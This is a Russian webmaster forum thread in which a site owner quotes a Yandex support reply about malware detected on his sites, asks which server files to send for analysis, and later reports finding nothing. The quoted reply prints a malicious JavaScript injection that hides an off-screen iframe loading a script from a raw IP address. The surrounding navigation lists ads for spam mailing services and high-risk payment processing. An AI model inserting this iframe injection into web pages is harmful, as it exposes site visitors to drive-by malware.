Вредоносный код. Ответ от Платона Щукина

Пару дней назад написал письмо в Службу поддержки Яндекса по поводу частого обнаружения вредоносного кода на двух моих сайтах. Сегодня получил такой ответ:

Цитата

Здравствуйте!

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

document.write('<style>.ihxck4rb { position:absolute; left:-1493px; top:-1491px} </style> <div class="ihxck4rb"><iframe src="http://129.121.203.202/9eb29177f66d54745371ac1c4052487d/q.php" width="120" height="101"></iframe></div>');

который детектировался в скрипте /engine/classes/min/index.php?charset=windows-1251&g=general&4" .

Данный вредоносный код динамически вставляется в HTTP ответ для произвольного js-файла, поэтому, возможно, Вы не сможете обнаружить его в указанных нами js-фалах. Мы предполагаем, что источник этого кода может находится на серверной стороне сайта: бинарные файлы, модули, конфигурационные файлы и т.п.
Если у Вас есть возможность, мы будем благодарны за любые присланные файлы для анализа данного типа заражения.

Может кто подскажет какие файлы отправлять

Новые темы	Объявления	Свободное общение
18:41 Продвижение заграницей 22:36 Стоит ли добавлять сайт в Rambler топ 100? 16:34 Работает ли ссылочное продвижение 2019 – 2020? 16:22 Adsense личный опыт 16:20 АП Яндекс ИКС 16.11.2023 16:19 У Google наблюдается снижение трафика и, как следствие, уменьшение прибыли 12:10 Взрывной рост роботности в Метрике	18:57 Прием платежей для HIGH RISK \| Прием платежей без сайта 18:57 Услуги рассылки Вконтакте 18:57 Услуги рассылки Viber\|Whatsapp\|IMO. 18:57 Рассылка в TELEGRAM \|Большой опыт работы \| Любые тематики \| Лучшая конверсия 18:24 Приватные мобильные прокси Украины безлимиты 4g UA Водафон Киевстар Лайф 17:25 TETChange-Обменник криптовалют 16:42 Swapper.ws - Обмен криптовалют. Быстро, выгодно, круглосуточно.	01:26 Точные прогнозы на футбол 12:12 Linux - это максимальная свобода 20:09 Сколько сейчас стоит наполнение ИМ? 12:43 Куплю проигрышные букмекерские аккаунты 04:33 Половина скидок на распродажах — фейк 07:53 НейроБабушка наказывает мошенников 19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко

Новые темы

Объявления

Свободное общение

18:41 Продвижение заграницей
22:36 Стоит ли добавлять сайт в Rambler топ 100?
16:34 Работает ли ссылочное продвижение 2019 – 2020?
16:22 Adsense личный опыт
16:20 АП Яндекс ИКС 16.11.2023
16:19 У Google наблюдается снижение трафика и, как следствие, уменьшение прибыли
12:10 Взрывной рост роботности в Метрике

18:57 Прием платежей для HIGH RISK | Прием платежей без сайта
18:57 Услуги рассылки Вконтакте
18:57 Услуги рассылки Viber|Whatsapp|IMO.
18:57 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия
18:24 Приватные мобильные прокси Украины безлимиты 4g UA Водафон Киевстар Лайф
17:25 TETChange-Обменник криптовалют
16:42 Swapper.ws - Обмен криптовалют. Быстро, выгодно, круглосуточно.

01:26 Точные прогнозы на футбол
12:12 Linux - это максимальная свобода
20:09 Сколько сейчас стоит наполнение ИМ?
12:43 Куплю проигрышные букмекерские аккаунты
04:33 Половина скидок на распродажах — фейк
07:53 НейроБабушка наказывает мошенников
19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко

25.05.2024 11:07	Долгий ответ сервера по Я. Вебмастер
08.08.2020 11:56	Можно с помощью накрутки ПФ "почувствовать выход в опу мира и ощутить ответ тех поддержки яшы"?
21.01.2020 02:19	Яндекс наложил фильтр за несоответствие безопасности. Как найти причину?
28.04.2019 08:52	Потерял трафик из за хостинга, кто несет ответственность?
18.01.2016 19:30	SiteMap Яндекс (нужен ответ)

fortnoxby Сообщений: 390 Регистрация: Авг 2012	#4 25 Февраля 2013 22:54 Так непонятно где искать. Этот файл /engine/classes/min/index.php проверил, ничего подобного не видел. Все файлы .js проверил. Тоже подобного кода не нашел